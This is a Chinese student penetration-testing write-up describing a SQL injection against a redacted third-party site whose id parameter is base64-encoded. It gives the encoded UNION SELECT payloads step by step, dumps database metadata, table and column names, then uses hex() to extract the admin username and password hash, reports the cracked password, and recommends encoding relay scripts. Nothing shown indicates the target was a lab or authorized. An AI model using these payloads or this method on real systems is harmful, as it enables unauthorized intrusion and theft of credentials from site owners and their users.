学员渗透录十三 base64变形注入+hex编码绕过
作者:M-7N10
这篇文章由学员M-7N10所写,一起来观看他的绕过注入。
目标站点 http://xxx.xxxcn/xxx/index.php?id=MTA=
MTA= 是10的base64编码
果断提交 http://xxx.xxx.cn/xxx/index.php?id=MTAn
报错了,soga 注入 提交 http://xxx.xxx.cn/xxx/index.php?id=MTAgb3JkZXIgYnkgMSM=
MTAgb3JkZXIgYnkgMSM=是 order by 1#的base64编码 页面正常
直到 order by 4报错了
so 3个字段
提交http://xxx.xxx.cn/xxx/index. ... iBzZWxlY3QgMSwyLDMj
爆显示位
显示位 为 2 3
ok 我们爆 user version database
提交
http://xxx.xxx.cn/xxx/index. ... GFiYXNlKCkpLDMjCg==
user media_yxx@localhost
version 5.5.24
database media_yxx
爆表
http://xxx.xxx.cn/xxx/index.php?id=MTAgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodGFibGVfbmFtZSksMyBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkj
表
paca_abstracts,paca_admins,paca_contents,paca_infos,paca_ip,paca_site,paca_users
管理表 果断 paca_admins
爆字段
http://xxx.xxx.cn/xxx/index.php?id=MTAgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQoY29sdW1uX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSdwYWNhX2FkbWlucycj
字段
id,username,userpass
但在爆字段内容的时候遇到个小问题
id=10 and 1=2 union select 1,group_concat(id,0x3a,username,0x3a,userpass),3 from paca_admins#
报错了
我就纳闷了
后来分别爆 id username userpass
发现 id可以爆
username 和 userpass 报不出来
彻底晕了
后来百度到 报不出内容可能是编码不同的原因
于是hex编码试了试
id=10 and 1=2 union select 1,hex(concat(username,0x3a,userpass)),3 from paca_admins#
终于爆出来了
事实上
id=10 and 1=2 union select 1,unhex(hex(concat(username,0x3a,userpass))),3 from paca_admins# 也是可以直接爆出来的
cmd5解密后 admin 456123 小菜就只能写到这里了。
暗月:这种编码注入,知道编码的前提,利用一些编码中转脚本,注入可以更快,更方便。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论